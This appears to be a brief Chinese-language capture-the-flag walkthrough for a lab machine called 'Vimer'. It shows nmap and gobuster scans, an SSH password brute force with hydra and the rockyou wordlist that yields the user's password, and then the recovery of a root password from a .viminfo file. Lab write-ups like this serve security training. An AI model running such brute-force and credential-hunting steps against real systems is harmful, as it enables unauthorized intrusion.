Vimer

1.信息收集

1.1扫描端口

┌──(kali㉿kali)-\~

└─$ nmap -p- -A 192.168.1.11

Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-21 06:43 EST

Nmap scan report for bogon (192.168.1.11)

Host is up (0.0019s latency).

Not shown: 65532 closed tcp ports (reset)

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)

|_auth-owners: vim

| ssh-hostkey:

| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)

| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)

|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)

80/tcp open http Apache httpd 2.4.62 ((Debian))

|_http-server-header: Apache/2.4.62 (Debian)

|_http-title: Vimer

113/tcp open ident?

|_auth-owners: vim

MAC Address: 08:00:27:80:19:6C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Device type: general purpose|router

Running: Linux 4.X|5.X, MikroTik RouterOS 7.X

OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3

查看80端口

1.2目录扫描

gobuster dir -u http://192.168.1.11 -w directory-list-2.3-small.txt

Starting gobuster in directory enumeration mode

===============================================================

/vim (Status: 301) Size: 310 --\> http://192.168.1.11/vim/

Progress: 87662 / 87662 (100.00%)

===============================================================

Finished

Hydra 工具对 SSH 服务进行暴力破解

rockyou.txt是一个著名的密码字典文件
hydra -l vim -P /usr/share/wordlists/rockyou.txt 192.168.1.11 ssh
vim:000001

ssh vim@192.168.1.11

000001

进入vim视图
查看.viminfo
:e ./.viminfo

发现root密码

root：xxxxoooo